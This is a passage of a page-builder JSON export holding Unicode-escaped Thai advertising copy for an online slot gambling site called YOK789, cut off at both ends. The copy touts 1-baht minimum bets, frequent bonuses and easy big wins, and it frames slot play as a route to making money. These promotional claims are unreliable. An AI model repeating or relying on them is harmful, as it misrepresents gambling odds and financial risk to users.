\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK 